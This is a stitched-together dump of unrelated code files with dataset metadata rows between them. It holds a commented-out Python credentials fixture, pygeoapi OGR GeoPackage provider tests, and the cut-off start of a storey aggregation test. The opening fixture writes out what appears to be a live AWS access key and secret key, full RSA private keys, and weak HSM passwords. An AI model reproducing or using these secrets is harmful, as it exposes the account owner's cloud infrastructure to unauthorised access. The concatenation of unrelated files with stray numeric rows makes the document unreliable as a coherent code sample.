# self.pem_private_key = b'-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-256-CBC,6F7135B1FF40772431A52344F2C28F3E\n\n17swNOMYJtX7XSMnL9C6MPmIaI34peR4CPUt0IWaiu5AfuHeGrho2PhaljlKX/Lt\nw4ykD/zrrKk88BrhTTPhArJNOporxC8d2BeyXtiIXqz4+yn256Ox4zfzkAdGq2xq\nRRzNHZot417yqUcIUSI+H39WkHVunhpNWJixMFKp5yhTf1JUHXCNOPNr4M/aALFD\n9U1pJ4t1H0umrNdHKI7lWat5+lnfXPe9GrQ+NYYobM6MX6uM7Mb9ggzN0234rOQM\nhLYdMGUCvXrWUoVHQ7mRR/DBa4S2ptAbyHsQZCOLLvnfQE+lCpT8SxkUf3xyeRGC\njGqHWANEHbdW7LKNS9aSbjoM5fXx9ToJJJiFAo4RuFVpTufVh8zhPscx1DjvVXLQ\nPo1WZrZusELmhzvJOgJQkNvrVnfGmHtB6CuzHUyXAriN1VUekWlNYi3gP5fC5MjO\n+bISUXiGLHi0DYe+x+0PHquI/u5Gugeh/k+q7pvbTnZ/r9so+P4aW2q1IDloFYXv\nDVO3VGdSef3mp1k4B49257K5Vri1XYjLXAkbQyuVFGWphQ4bSHCscZhAevpzCDVk\nPrD0R+egohy/ErZllbp7+rc+VpHMBXpi5LEYAetpdR5URrgZAP5L2WWS4/WtsoAb\nnApoqMuq53QaOjjWx2wTtyU1lOGoT5pSS4/c1UKxV/72Dpbu96e8MBhjwwmIZiGW\nD5fjHJzEDZxtA/YFS1UHxb8hPsMRJkb67dR1fOSDXBWLZdi0MQ1que60bXV4+a8W\nJTKzpf8yOaNkI98QqGcvbfZWcgQ/sMVduOrx1VsndFqXiJ4M5heCAU+3gKAaX9HG\nkoYtTnp+LbshZNawdyW1MtdeeP8zrVfAx+WrYcI8/XL7+tge4n6VkVoqxD6IJX3a\nZ6EPY/J/IBSQsYIeQe4QDrjR1ztbNBS4KMBlJofM3IlPY5ee9L61QBwCW9zM9FNI\n8s54O2D3nGgc5fGteB5Ze4qGDFshPKXJU5uFcSZ19202NhuPTeWkuCFXMSz41eRL\n3kog6OW5q3UNPgMAb9nmuQzDt7fALY9fzl3n6CV/lli68oP8ji8iqqTvP5tjkgQa\nVC5IY97qs0JoeEnORSMo0SdnL/4YK5eni5pZxR1pvdXV0t4Vqap0f2SEi0yL8HxA\nLtmCTYdD9e/IEFcPjoFp/M5NcPUP81S8gJUwLWo9eI2Cpe7tZBrdWHQ6Z8Kc3mQQ\nflT5wXps/H9CmVkDFIu/VuOLxHxVzl7L20a8zkZDRhqnij/IqG+UM27dZ/Rc48Vu\nG7S4um6eahANe7r2n4gDApQBlziUApR5PIeZUFpKELTNKJ4BY1Ttsmt+y3EDU8Uk\nBt38zSYs251WmKjuRwR99dny7p+jjxBdJSW5xpoSv7/DdH9UaF2PhAXetdeYRWnt\nu2lshQzrZBruQpcSCbFS3FvmlNlKc4zoSt9lNp+NgGLZzbLciSQhF5+nyz2k+K26\nZyTbjiaWhK+AfxtgWG84iuJI7DtcuP1MRuud0aV9PZV/KZ8X1AnqDsxCUsUwjtAj\nM5PTCWRL0tSkQKRue8iueN498DdzlK+QqkRGdN3j/YTmh8KZzLvjiUxAUPXByjaV\n-----END RSA PRIVATE KEY-----\n'
# @property
# def credentials_kwargs(self):
# return {
# 'aws_region': data.aws_region,
# 'ssh_key_name': data.ssh_key_name,
# 'cluster_id': data.cluster_id,
# 'instance_id': data.instance_id,
# 'aws_access_key_id': data.aws_access_key_id,
# 'aws_secret_access_key': data.aws_secret_access_key,
# 'customer_ca_key_password': data.customer_ca_key_password,
# 'crypto_officer_password': data.crypto_officer_password,
# 'crypto_user_username': data.crypto_user_username,
# 'crypto_user_password': data.crypto_user_password,
# }
# @property
# def ssh_key_create_resp(self):
# return {
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyMaterial': self.KeyMaterial,
# 'KeyName': self.KeyName,
# 'KeyPairId': self.KeyPairId
# }
# @property
# def ssh_key_describe_resp(self):
# return {
# 'KeyPairs': [
# {
# 'KeyPairId': self.KeyPairId,
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyName': self.KeyName,
# 'Tags': []
# },
# {
# 'KeyPairId': self.KeyPairId2,
# 'KeyFingerprint': self.KeyFingerprint2,
# 'KeyName': self.KeyName2,
# 'Tags': []
# }
# ]}
# @property
# def ssh_key_kwargs(self):
# return {
# 'id': self.KeyPairId,
# 'name': self.KeyName,
# 'material': self.KeyMaterial,
# 'fingerprint': self.KeyFingerprint
# }
# @property
# def certs_kwargs(self):
# return {
# 'pem_csr': self.pem_csr,
# 'passphrase': self.passphrase
# }
# t = CredentialsData()
# class CredentialsData:
# def __init__(self):
# self.test_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/tests/test_files'
# self.production_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/production_files'
# self.aws_region = 'us-east-2'
# self.ssh_key_name = 'Piggy_SSH_Key_cf865bae'
# self.cluster_id = 'cluster-lbtkdldygfh'
# self.instance_id = 'i-051bdb2ae099024a5'
# self.aws_access_key_id = 'AKIA5YNNN4JH6JDQF5XH'
# self.aws_secret_access_key = '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'
# self.customer_ca_key_password = 'password1'
# self.crypto_officer_password = 'password1'
# self.crypto_user_username = 'cryptouser'
# self.crypto_user_password = 'password1'
# self.KeyFingerprint = '08:c9:28:e5:24:38:d5:ef:9b:a1:76:22:9f:00:0c:eb:47:16:59:cd'
# self.KeyMaterial = '-----BEGIN RSA PRIVATE KEY-----\nMIIEpQIBAAKCAQEAkOrCB3e0Fj/Cv797THZn5YgxIPywNdlg284rMSshrLl8QC83\n0ck0K9CP3Y+rCuHGx7t/2tCtl66uKlwOPFvWGDi+akonkUeVqnV8U1z5jNhI8SwY\niXtcFX0twIGHaaxYQrWZvOUAnmE8JUGd7Pysy4Sy7/ZEldXwEN3fN2NIPRnQwii7\nS5tv573C2am2MMXtwEKtQi3uWgPu//maXqoM0/PuxTDk9DUKnN88nvNBMoTlHr1P\nl9QsHMPyXvJ/+TTPdVybXwMvv1KgCMeGid43CPu7SFa8trx9DuvSY03TwYyhZIp6\nMsPZot6pu+opRXgF7SkSpp/+ABPoA836sPF0+wIDAQABAoIBAAESi68Mdru3axSK\nMTpmoewz7tEkrZUob6wQwYcSn6QslzvOXaZiy80LNRVZq9VfyF3QCGkxJCe8NjPA\nDKbrsxDo0pfsxpAvrG7fgbUIOhyNuTR3tBLIY+0QyRbknoDsspaDy4h3VWLWq2BH\nNQj88bZr2/skomtNcwJc8frx9CXnmR1erB8d7UybKFiYL4ggM/MVQbdn66ZpmKCK\naZ774lbgdiwp8YZp1ANFw7zBr1MTqXKLmghtYZoornRUVk2c3OPUII62jmarUaqn\nKL+q2198j0axDsmFCAALTbmxjo//XWxwTeaRNwsi0hqeENEy1ywtidn1A8eHJaOi\nvGlV6LkCgYEA4rabAGB7OQTunGj6BiQBN8AnG/1B77HBA/VRy3YUHdPaBYtldLuX\nZrQKuE3l13uX0whXr+BQVDtDiegocz4r41/MR9uUoQFHnsL25D+A44xveT2scTHm\nBHpUprq8ti4XyNJGpnZXSxQCRzhcGnJItvfOaQWW+slEnR4RUuWCdjUCgYEAo6Mn\nmT+NyNCfJHWvF951fvRi7liktRzIcIL7Hu4gDkTTJ7U/Ms3OgQTsQ6VIfNeotAYC\nFe/GVb+SB91MnnCFwPbwt1vIwdLGvKtAUq3OQvE8Jv1LCC3XQJcRv/tJuP6lLz1t\nWNF59Uz0Ar6VN9tIctdribKGP6Dxg32OLlrV5G8CgYEAotnQlYC4gsjMLYYqsuaC\nCW35qd1N08O3hgRd8OysnpBi98Cd7DAkHR4O5TzvcM3SzUAc3LUgfqDjbthY1g8+\nr2FM+AD+zniA3cXmWyZSiyGBoXFvwQ+6zlShIfLZQ3PwmcyR+1jec4u35zjQ0B5v\npR50InRlc1fH9aR3hThfclECgYEAh+bv80GqIpbJJQGsKnmyQX78TxFFsbk26uKN\nZxHDg7Y7XCYWV74/fD23bzLtMen2DZVT1B4wLXUN9gQgJxIys6EjKFVNNVQ1g+oC\nYOhCfqxVFdiVoTRZKiaNMlGj18V9MO+mSfangEep/EGGMj6nO+GXSWQARQYIrvju\nxabhL3cCgYEAlPAbQgqljbfs6pIG5eEKHNLXaCZxFeZDQ+PQ9CYBsCL0nPo0e1iw\nHNFx2A/BN0hEZxiOO0LnDV5paFhAd+rFhSvxdgwhOBvxU1TDwcNCoyqpbJ57BB3e\n5d+ShkCu0K3LbKn65ZAtvJCB9yleu5VUIt6i+q/aaPLcWTcf+YxVDfM=\n-----END RSA PRIVATE KEY-----'
# self.KeyName = 'Piggy_SSH_Key_0194afd1'
# self.KeyPairId = 'key-0a070814c64fa0e65'
# self.KeyFingerprint2 = 'de:7b:e3:aa:81:52:89:be:a5:01:a0:87:8d:67:76:47:e8:a5:9f:0c'
# self.KeyName2 = 'Piggy_SSH_Key_40cc19f5'
# self.KeyPairId2 = 'key-071d152e1ec5428df'
# self.pem_csr = '-----BEGIN CERTIFICATE REQUEST-----\nMIIC0TCCAbkCAQAwgYsxRDAJBgNVBAYTAlVTMAkGA1UECAwCQ0EwDQYDVQQKDAZD\nYXZpdW0wDQYDVQQLDAZOM0ZJUFMwDgYDVQQHDAdTYW5Kb3NlMUMwQQYDVQQDDDpI\nU006QjRGMUU4QjY3OTY3NTg2M0Y4REIzMjExMTM2NEIzOlBBUlROOjEzLCBmb3Ig\nRklQUyBtb2RlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvDY9IZlR\nThUQ2Jfc+JWPC15WqZbMRKiEba+FICcwno+izaDza+rzpqtaU0Q5UVYGOe4vEtVj\nxsj3hdhXc2rK53vhw4EdmKojPzAy3F/TJGzSvzIlPUCdWLtbKlNEkg/VGu1YcsMV\nvQvyGFSusj8idWT4DvsZxPuEwiXE4qEPmyB1uo2lKIYWfulP9QrRdvnrBF/zBmXO\nblg3zHf1KQ8bYWW8Lc/DGcRnRvPBfDvYNS6DJPrMiM+QeqhM5Iegu7OlTOTkV72d\nmaMqTuuWOGrb6LCDr7hWGfjAE3517Jt2ia2bB8YE5Wda4mUBEmpVl5Kho547S6Sx\nMiChX3U3VCHbVwIDAQABoAAwDQYJKoZIhvcNAQELBQADggEBAKqEhDqVClGRES2C\nIwqKxPVYo5lbynEZ94qSeKzI9rgoW3kPVyro1vBxAzMwDSJd1TXmw2fJAOY7Zdiw\n+j0SMZCb81ehVNa8VRUsOrU6phC72jqUSFSWpRkCDxc9inIdUfBpqIQxsd0JpYB7\nzvyuKILMNDI3Ys7S4i1ErHv8IyDUdmVjP+qRaEAhecBEt5GVZPDg/vjEsS83hqf4\n7EZ9S9noDgnoa79W1ovFr8wW8EZ5Spi50D5hsFCMy4a4rErwneAATEm2MmtLfIy7\nCWTUET6SZN2Ncn/oM1ulVYofYTctmpiAGMMjB9joA6nW0I2QfhaSOTugU+NmwnC0\nOo+qHwM=\n-----END CERTIFICATE REQUEST-----\n'
# self.passphrase = 'password1'
# self.pem_private_key = b'-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-256-CBC,6F7135B1FF40772431A52344F2C28F3E\n\n17swNOMYJtX7XSMnL9C6MPmIaI34peR4CPUt0IWaiu5AfuHeGrho2PhaljlKX/Lt\nw4ykD/zrrKk88BrhTTPhArJNOporxC8d2BeyXtiIXqz4+yn256Ox4zfzkAdGq2xq\nRRzNHZot417yqUcIUSI+H39WkHVunhpNWJixMFKp5yhTf1JUHXCNOPNr4M/aALFD\n9U1pJ4t1H0umrNdHKI7lWat5+lnfXPe9GrQ+NYYobM6MX6uM7Mb9ggzN0234rOQM\nhLYdMGUCvXrWUoVHQ7mRR/DBa4S2ptAbyHsQZCOLLvnfQE+lCpT8SxkUf3xyeRGC\njGqHWANEHbdW7LKNS9aSbjoM5fXx9ToJJJiFAo4RuFVpTufVh8zhPscx1DjvVXLQ\nPo1WZrZusELmhzvJOgJQkNvrVnfGmHtB6CuzHUyXAriN1VUekWlNYi3gP5fC5MjO\n+bISUXiGLHi0DYe+x+0PHquI/u5Gugeh/k+q7pvbTnZ/r9so+P4aW2q1IDloFYXv\nDVO3VGdSef3mp1k4B49257K5Vri1XYjLXAkbQyuVFGWphQ4bSHCscZhAevpzCDVk\nPrD0R+egohy/ErZllbp7+rc+VpHMBXpi5LEYAetpdR5URrgZAP5L2WWS4/WtsoAb\nnApoqMuq53QaOjjWx2wTtyU1lOGoT5pSS4/c1UKxV/72Dpbu96e8MBhjwwmIZiGW\nD5fjHJzEDZxtA/YFS1UHxb8hPsMRJkb67dR1fOSDXBWLZdi0MQ1que60bXV4+a8W\nJTKzpf8yOaNkI98QqGcvbfZWcgQ/sMVduOrx1VsndFqXiJ4M5heCAU+3gKAaX9HG\nkoYtTnp+LbshZNawdyW1MtdeeP8zrVfAx+WrYcI8/XL7+tge4n6VkVoqxD6IJX3a\nZ6EPY/J/IBSQsYIeQe4QDrjR1ztbNBS4KMBlJofM3IlPY5ee9L61QBwCW9zM9FNI\n8s54O2D3nGgc5fGteB5Ze4qGDFshPKXJU5uFcSZ19202NhuPTeWkuCFXMSz41eRL\n3kog6OW5q3UNPgMAb9nmuQzDt7fALY9fzl3n6CV/lli68oP8ji8iqqTvP5tjkgQa\nVC5IY97qs0JoeEnORSMo0SdnL/4YK5eni5pZxR1pvdXV0t4Vqap0f2SEi0yL8HxA\nLtmCTYdD9e/IEFcPjoFp/M5NcPUP81S8gJUwLWo9eI2Cpe7tZBrdWHQ6Z8Kc3mQQ\nflT5wXps/H9CmVkDFIu/VuOLxHxVzl7L20a8zkZDRhqnij/IqG+UM27dZ/Rc48Vu\nG7S4um6eahANe7r2n4gDApQBlziUApR5PIeZUFpKELTNKJ4BY1Ttsmt+y3EDU8Uk\nBt38zSYs251WmKjuRwR99dny7p+jjxBdJSW5xpoSv7/DdH9UaF2PhAXetdeYRWnt\nu2lshQzrZBruQpcSCbFS3FvmlNlKc4zoSt9lNp+NgGLZzbLciSQhF5+nyz2k+K26\nZyTbjiaWhK+AfxtgWG84iuJI7DtcuP1MRuud0aV9PZV/KZ8X1AnqDsxCUsUwjtAj\nM5PTCWRL0tSkQKRue8iueN498DdzlK+QqkRGdN3j/YTmh8KZzLvjiUxAUPXByjaV\n-----END RSA PRIVATE KEY-----\n'
# @property
# def credentials_kwargs(self):
# return {
# 'aws_region': self.aws_region,
# 'ssh_key_name': self.ssh_key_name,
# 'cluster_id': self.cluster_id,
# 'instance_id': self.instance_id,
# 'aws_access_key_id': self.aws_access_key_id,
# 'aws_secret_access_key': self.aws_secret_access_key,
# 'customer_ca_key_password': self.customer_ca_key_password,
# 'crypto_officer_password': self.crypto_officer_password,
# 'crypto_user_username': self.crypto_user_username,
# 'crypto_user_password': self.crypto_user_password,
# }
# @property
# def ssh_key_create_resp(self):
# return {
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyMaterial': self.KeyMaterial,
# 'KeyName': self.KeyName,
# 'KeyPairId': self.KeyPairId
# }
# @property
# def ssh_key_describe_resp(self):
# return {
# 'KeyPairs': [
# {
# 'KeyPairId': self.KeyPairId,
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyName': self.KeyName,
# 'Tags': []
# },
# {
# 'KeyPairId': self.KeyPairId2,
# 'KeyFingerprint': self.KeyFingerprint2,
# 'KeyName': self.KeyName2,
# 'Tags': []
# }
# ]}
# @property
# def ssh_key_kwargs(self):
# return {
# 'id': self.KeyPairId,
# 'name': self.KeyName,
# 'material': self.KeyMaterial,
# 'fingerprint': self.KeyFingerprint
# }
# @property
# def certs_kwargs(self):
# return {
# 'pem_csr': self.pem_csr,
# 'passphrase': self.passphrase
# }
# t = CredentialsData()
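# A minimal usage sketch for the fixture above (hypothetical consumer; the
# code that actually receives these kwargs is not part of this file):
#
#     data = CredentialsData()
#     creds = data.credentials_kwargs    # dict ready for **-expansion
#     ssh_key = data.ssh_key_kwargs      # id / name / material / fingerprint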
| 85.681384 | 1,832 | 0.778137 | 5,069 | 71,801 | 10.85145 | 0.068455 | 0.008944 | 0.008508 | 0.006872 | 0.986183 | 0.986183 | 0.985311 | 0.985311 | 0.985311 | 0.985311 | 0 | 0.110791 | 0.135625 | 71,801 | 837 | 1,833 | 85.783751 | 0.775502 | 0.964109 | 0 | 0.071429 | 0 | 0 | 0.014431 | 0 | 0 | 1 | 0 | 0 | 0.035714 | 1 | 0.107143 | false | 0 | 0.357143 | 0 | 0.464286 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 11 |
07878500726e012b07aa52923469099f8746af6a | 11,638 | py | Python | tests/test_ogr_gpkg_provider.py | bradh/pygeoapi | d80f80e413235d4c7e263c44fa85318b29326a9c | ["MIT"] | null | null | null | tests/test_ogr_gpkg_provider.py | bradh/pygeoapi | d80f80e413235d4c7e263c44fa85318b29326a9c | ["MIT"] | null | null | null | tests/test_ogr_gpkg_provider.py | bradh/pygeoapi | d80f80e413235d4c7e263c44fa85318b29326a9c | ["MIT"] | null | null | null |
# Needs to be run like: python3 -m pytest

import logging

import pytest

from pygeoapi.provider.ogr import OGRProvider

LOGGER = logging.getLogger(__name__)


@pytest.fixture()
def config_poi_portugal():
    return {
        'name': 'OGR',
        'data': {
            'source_type': 'GPKG',
            'source': './tests/data/poi_portugal.gpkg',
            'source_srs': 'EPSG:4326',
            'target_srs': 'EPSG:4326',
            'source_capabilities': {
                'paging': True
            },
        },
        'id_field': 'osm_id',
        'layer': 'poi_portugal'
    }
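# The fixture above mirrors a pygeoapi provider configuration block: 'data'
# points OGR at a local GeoPackage and declares source/target SRS, while
# 'id_field' and 'layer' tell the provider how to address single features.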
def test_query(config_poi_portugal):
    """Testing query for a valid JSON object with geometry"""
    p = OGRProvider(config_poi_portugal)
    feature_collection = p.query()
    assert feature_collection.get('type', None) == 'FeatureCollection'
    features = feature_collection.get('features', None)
    assert features is not None
    feature = features[0]
    properties = feature.get('properties', None)
    assert properties is not None
    geometry = feature.get('geometry', None)
    assert geometry is not None


def test_get(config_poi_portugal):
    p = OGRProvider(config_poi_portugal)
    result = p.get(5156778016)
    assert result['id'] == 5156778016
    assert 'tourist_info' in result['properties']['fclass']


# Testing with GeoPackage files with identical features
# (all 2481 addresses in Otterlo Netherlands)
# in different projections.

@pytest.fixture()
def config_gpkg_4326():
    return {
        'name': 'OGR',
        'data': {
            'source_type': 'GPKG',
            'source':
                './tests/data/dutch_addresses_4326.gpkg',
            'source_srs': 'EPSG:4326',
            'target_srs': 'EPSG:4326',
            'source_capabilities': {
                'paging': True
            },
        },
        'id_field': 'id',
        'layer': 'OGRGeoJSON'
    }
# Same address set as above, but stored in EPSG:28992 (Dutch RD New);
# the provider reprojects results to EPSG:4326.
@pytest.fixture()
def config_gpkg_28992():
    return {
        'name': 'OGR',
        'data': {
            'source_type': 'GPKG',
            'source':
                './tests/data/dutch_addresses_28992.gpkg',
            'source_srs': 'EPSG:28992',
            'target_srs': 'EPSG:4326',
            'source_capabilities': {
                'paging': True
            },
        },
        'id_field': 'id',
        'layer': 'OGRGeoJSON'
    }


def test_get_fields_4326(config_gpkg_4326):
    """Testing field types"""
    p = OGRProvider(config_gpkg_4326)
    results = p.get_fields()
    assert results['straatnaam'] == 'string'
    assert results['huisnummer'] == 'string'


def test_get_28992(config_gpkg_28992):
    """Testing query for a specific object"""
    p = OGRProvider(config_gpkg_28992)
    result = p.get('inspireadressen.1747652')
    assert result['id'] == 'inspireadressen.1747652'
    assert 'Mosselsepad' in result['properties']['straatnaam']


def test_get_4326(config_gpkg_4326):
    """Testing query for a specific object"""
    p = OGRProvider(config_gpkg_4326)
    result = p.get('inspireadressen.1747652')
    assert result['id'] == 'inspireadressen.1747652'
    assert 'Mosselsepad' in result['properties']['straatnaam']
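# resulttype='hits' asks the provider for a count only: the response is still
# a FeatureCollection, but with an empty 'features' list and the total count
# in 'numberMatched', as the two tests below verify for both projections.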
def test_query_hits_28992(config_gpkg_28992):
"""Testing query on entire collection for hits"""
p = OGRProvider(config_gpkg_28992)
feature_collection = p.query(resulttype='hits')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 0
hits = feature_collection.get('numberMatched', None)
assert hits is not None
assert hits == 2481
def test_query_hits_4326(config_gpkg_4326):
"""Testing query on entire collection for hits"""
p = OGRProvider(config_gpkg_4326)
feature_collection = p.query(resulttype='hits')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 0
hits = feature_collection.get('numberMatched', None)
assert hits is not None
assert hits == 2481
def test_query_bbox_hits_4326(config_gpkg_4326):
"""Testing query for a valid JSON object with geometry"""
p = OGRProvider(config_gpkg_4326)
# feature_collection = p.query(
# bbox=[120000, 480000, 124000, 487000], resulttype='hits')
feature_collection = p.query(
bbox=[5.763409, 52.060197, 5.769256, 52.061976], resulttype='hits')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 0
hits = feature_collection.get('numberMatched', None)
assert hits is not None
    LOGGER.debug('hits=%s', hits)
assert hits == 1
def test_query_bbox_hits_28992(config_gpkg_28992):
"""Testing query for a valid JSON object with geometry, single address"""
p = OGRProvider(config_gpkg_28992)
# feature_collection = p.query(
# bbox=(180800, 452500, 181200, 452700), resulttype='hits')
feature_collection = p.query(
bbox=[5.763409, 52.060197, 5.769256, 52.061976], resulttype='hits')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 0
hits = feature_collection.get('numberMatched', None)
assert hits is not None
    LOGGER.debug('hits=%s', hits)
assert hits == 1
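
# Note: both fixtures are queried with the same WGS84 bbox because
# target_srs is 'EPSG:4326' in each config; the provider reprojects the
# EPSG:28992 source, so the results should be identical. The commented-out
# bboxes above are (roughly) the same extent expressed in the native
# Dutch RD (EPSG:28992) coordinates.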
def test_query_bbox_28992(config_gpkg_28992):
"""Testing query for a valid JSON object with geometry"""
p = OGRProvider(config_gpkg_28992)
# feature_collection = p.query(
# bbox=[180800, 452500, 181200, 452700], resulttype='results')
feature_collection = p.query(
bbox=(5.763409, 52.060197, 5.769256, 52.061976), resulttype='results')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 1
hits = feature_collection.get('numberMatched', None)
assert hits is None
feature = features[0]
properties = feature.get('properties', None)
assert properties is not None
geometry = feature.get('geometry', None)
assert geometry is not None
assert properties['straatnaam'] == 'Planken Wambuisweg'
def test_query_bbox_4326(config_gpkg_4326):
"""Testing query for a valid JSON object with geometry"""
p = OGRProvider(config_gpkg_4326)
# feature_collection = p.query(
# bbox=[180800, 452500, 181200, 452700], resulttype='results')
feature_collection = p.query(
bbox=(5.763409, 52.060197, 5.769256, 52.061976), resulttype='results')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 1
hits = feature_collection.get('numberMatched', None)
assert hits is None
feature = features[0]
properties = feature.get('properties', None)
assert properties is not None
geometry = feature.get('geometry', None)
assert geometry is not None
assert properties['straatnaam'] == 'Planken Wambuisweg'
def test_query_with_limit_28992(config_gpkg_28992):
"""Testing query for a valid JSON object with geometry"""
p = OGRProvider(config_gpkg_28992)
feature_collection = p.query(limit=2, resulttype='results')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 2
hits = feature_collection.get('numberMatched', None)
assert hits is None
feature = features[0]
properties = feature.get('properties', None)
assert properties is not None
geometry = feature.get('geometry', None)
assert geometry is not None
def test_query_with_limit_4326(config_gpkg_4326):
"""Testing query for a valid JSON object with geometry"""
p = OGRProvider(config_gpkg_4326)
feature_collection = p.query(limit=5, resulttype='results')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 5
hits = feature_collection.get('numberMatched', None)
assert hits is None
feature = features[0]
properties = feature.get('properties', None)
assert properties is not None
geometry = feature.get('geometry', None)
assert geometry is not None
def test_query_with_startindex_28992(config_gpkg_28992):
"""Testing query for a valid JSON object with geometry"""
p = OGRProvider(config_gpkg_28992)
feature_collection = p.query(startindex=20, limit=5, resulttype='results')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 5
hits = feature_collection.get('numberMatched', None)
assert hits is None
feature = features[0]
properties = feature.get('properties', None)
assert properties is not None
assert feature['id'] == 'inspireadressen.1744969'
assert 'Egypte' in properties['straatnaam']
geometry = feature.get('geometry', None)
assert geometry is not None
def test_query_with_startindex_4326(config_gpkg_4326):
"""Testing query for a valid JSON object with geometry"""
p = OGRProvider(config_gpkg_4326)
feature_collection = p.query(startindex=20, limit=5, resulttype='results')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 5
hits = feature_collection.get('numberMatched', None)
assert hits is None
feature = features[0]
properties = feature.get('properties', None)
assert properties is not None
assert feature['id'] == 'inspireadressen.1744969'
assert 'Egypte' in properties['straatnaam']
geometry = feature.get('geometry', None)
assert geometry is not None
def test_query_bbox_with_startindex_28992(config_gpkg_28992):
"""Testing query for a valid JSON object with geometry"""
p = OGRProvider(config_gpkg_28992)
feature_collection = p.query(
startindex=10, limit=5,
bbox=(5.742, 52.053, 5.773, 52.098),
resulttype='results')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 5
hits = feature_collection.get('numberMatched', None)
assert hits is None
feature = features[0]
properties = feature.get('properties', None)
assert properties is not None
geometry = feature.get('geometry', None)
assert geometry is not None
assert properties['straatnaam'] == 'Buurtweg'
assert properties['huisnummer'] == '4'
def test_query_bbox_with_startindex_4326(config_gpkg_4326):
"""Testing query for a valid JSON object with geometry"""
p = OGRProvider(config_gpkg_4326)
feature_collection = p.query(
startindex=1, limit=5,
bbox=(5.742, 52.053, 5.773, 52.098),
resulttype='results')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 5
hits = feature_collection.get('numberMatched', None)
assert hits is None
feature = features[0]
properties = feature.get('properties', None)
assert properties is not None
geometry = feature.get('geometry', None)
assert geometry is not None
assert properties['straatnaam'] == 'Egypte'
assert properties['huisnummer'] == '6'
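
# To run a single test from this module, something like the following
# should work with any recent pytest:
#
#     python3 -m pytest tests/test_ogr_gpkg_provider.py -k test_query_bbox_4326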

# Source: dinal/storey -- integration/test_aggregation_integration.py (Python, 86,060 bytes)
# Revision 811363cdeaa4d3008d929f9889e6cbb590e7a754 | License: Apache-2.0
import asyncio
from datetime import timedelta
import pytest
import math
import pandas as pd
from storey import build_flow, SyncEmitSource, Reduce, Table, V3ioDriver, MapWithState, AggregateByKey, FieldAggregator, \
QueryByKey, NoSqlTarget, Context, DataframeSource, Map
from storey.dtypes import SlidingWindows, FixedWindows, EmitAfterMaxEvent
from storey.utils import _split_path
from .integration_test_utils import setup_teardown_test, append_return, test_base_time
@pytest.mark.parametrize('partitioned_by_key', [True, False])
@pytest.mark.parametrize('flush_interval', [None, 1])
def test_aggregate_and_query_with_different_sliding_windows(setup_teardown_test, partitioned_by_key, flush_interval):
table = Table(setup_teardown_test, V3ioDriver(), partitioned_by_key=partitioned_by_key, flush_interval_secs=flush_interval)
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['sum', 'avg', 'min', 'max', 'sqr'],
SlidingWindows(['1h', '2h', '24h'], '10m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0, 'number_of_stuff_sum_24h': 0, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 0, 'number_of_stuff_max_2h': 0,
'number_of_stuff_max_24h': 0, 'number_of_stuff_sqr_1h': 0, 'number_of_stuff_sqr_2h': 0, 'number_of_stuff_sqr_24h': 0,
'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0, 'number_of_stuff_avg_24h': 0.0, 'col1': 0},
{'number_of_stuff_sum_1h': 1, 'number_of_stuff_sum_2h': 1, 'number_of_stuff_sum_24h': 1, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 1, 'number_of_stuff_max_2h': 1,
'number_of_stuff_max_24h': 1, 'number_of_stuff_sqr_1h': 1, 'number_of_stuff_sqr_2h': 1, 'number_of_stuff_sqr_24h': 1,
'number_of_stuff_avg_1h': 0.5, 'number_of_stuff_avg_2h': 0.5, 'number_of_stuff_avg_24h': 0.5, 'col1': 1},
{'number_of_stuff_sum_1h': 3, 'number_of_stuff_sum_2h': 3, 'number_of_stuff_sum_24h': 3, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 2, 'number_of_stuff_max_2h': 2,
